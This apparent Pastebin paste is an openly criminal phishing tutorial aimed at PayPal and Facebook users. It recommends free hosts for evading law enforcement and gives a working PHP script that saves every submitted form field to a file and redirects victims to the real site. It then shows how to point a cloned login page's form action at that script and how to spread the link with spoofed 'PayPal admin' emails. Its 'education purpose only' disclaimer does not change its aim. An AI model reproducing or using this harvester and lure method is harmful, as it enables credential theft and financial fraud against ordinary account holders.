Advertisement
Guest User

Untitled

a guest
Nov 30th, 2019
4,817
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.40 KB | None | 0 0
  1. Basic Phishing tutorial
  2.  
  3. Today I will write for something very powerful in hacking phishing this is the one of the most illegal techniques in hacking.
  4. !I'm not responsible for your actions I write this for education purpose only if you get in to trouble I'm not responsible!
  5. Phishing is highly illegal so if you are new to hacking I will recommend first to do other stuff like RATing and keylogging then phishing.
  6. When you are phishing you have to highly protect your self.
  7.  
  8. First you need to sing up in very secure hosting. That won't get you in trouble I can't recommend you but after short search on internet I found some.
  9.  
  10. Code:
  11.  
  12. cwahi - http://cwahi.com
  13. 110mb - http://110mb.com
  14. Ripway - http://ripway.com
  15. SuperFreeHost - http://superfreehost.info
  16. Freehostia - http://freehostia.com
  17. Freeweb7 - http://freeweb7.com
  18. t35 - http://t35.com
  19. Awardspace - http://awardspace.com
  20. PHPNet - http://phpnet.us
  21. Free Web Hosting Pro - http://freewebhostingpro.com
  22. ProHosts - http://prohosts.org
  23. FreeZoka - http://www.freezoka.com/
  24. 000webhost - http://000webhost.com/
  25. AtSpace - http://atspace.com
  26.  
  27.  
  28. I can't assure that those hosting are secure and there aren't Federals ! Those are free hostings. I haven't found paid but I thing that they are more secure.
  29.  
  30. So when you have found hosting its time to create phishing pages.
  31.  
  32. Let's say you have target Paypal (I won't recommend to target it when you don't have experience ) you will need login from there to get them there are 2 ways.
  33.  
  34. 1.To use tool called Phish Creator - http://www.youtube.com/watch?v=xoTHvHQsroA
  35. I don't know is it backdoored or not.
  36. For linux users - http://www.youtube.com/watch?v=C_lFkiOYy...re=related
  37. 2.To do it manually.
  38.  
  39. Ok go to Paypal login page(in our case if you are going to phish Facebooks go to Facebook login page) and save it.
  40. Now you should create script that will record all variable write in the page I can't help you here.
  41.  
  42. kidding open editor(notepad for example) and write this script.
  43.  
  44.  
  45. Code:
  46.  
  47.  
  48. <?php
  49. header("Location: paypal.com");
  50. $handle = fopen("accs.txt", "a");
  51. foreach($_GET as $variable => $value)
  52. {
  53. fwrite($handle, $variable);
  54. fwrite($handle, "=");
  55. fwrite($handle, $value);
  56. fwrite($handle, "\r\n");
  57. }
  58. fwrite($handle, "\r\n");
  59. fclose($handle);
  60. exit;
  61. ?>
  62.  
  63. Paste this and edit where is needed then save this will save all accs to accs.txt.
  64. Now you should link this page to the save you have save earlier.
  65. Open saved login page with editor and find "action=" and change it with page you have
  66. create(copy).
  67. example
  68.  
  69.  
  70. Code:
  71.  
  72.  
  73. action="https://www.paypal.com/bg/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33"
  74. will become
  75.  
  76.  
  77. Code:
  78.  
  79.  
  80. action="https://www.your-hosting.com/your-file"
  81. What you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page.
  82.  
  83. You are ready now its time to start spreading your link .
  84. I'm not the best in this section but I can help .
  85. E-mail Spam - This is highly illegal too. But in our case we attack paypal so lets spoof the email to paypal admins and send email in which we say that there is update to the system and they need to enter their information again.
  86. - Belive or not this is very effective way.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement